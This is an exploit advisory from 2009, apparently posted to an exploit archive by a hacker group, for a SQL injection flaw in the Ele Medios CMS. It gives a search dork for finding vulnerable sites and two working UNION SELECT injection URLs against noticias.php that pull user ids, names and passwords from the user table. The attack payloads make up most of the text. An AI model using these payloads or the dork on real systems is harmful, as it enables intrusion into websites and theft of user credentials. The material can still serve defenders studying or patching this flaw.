1 ALGERIAN HACKER
2 **********************− NORTH−AFRICA SECURITY TEAM −***********************
3
4 [!] Ele Medios CMS SQL Injection Vulnerability
5 [!] Author : Dr.0rYX and Cr3w−DZ
6 [!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
7
8 ***************************************************************************/
9
10 [ Software Information ]
11
12 [+] Vendor : http://www.elemedios.net/
13 [+] script : Ele Medios CMS
14 [+] Download : http://www.elemedios.net/
15 [+] Vulnerability : php SQL injection
16 [+] Dork :inurl:"noticias.php?notiId="
17
18 **************************************************************************/
19 [ Vulnerable File ]
20
21 http://server/noticias.php?notiId=[N.A.S.T ]
22
23 [ Exploit ]
24
25 http://server/noticias.php?notiId=−1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuari
os
26
27 http://server/noticias.php?notiId=−1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+8+from+auteUsua
rios
28
29 [ GReets ]
30
31 [+] :claw , le0n , exploit−db.com , ALL HACKERS MUSLIMS
Page 1/1
Ele Medios CMS SQL Injection Vulnerability
Dr.0rYX and Cr3w−DZ
12/13/2009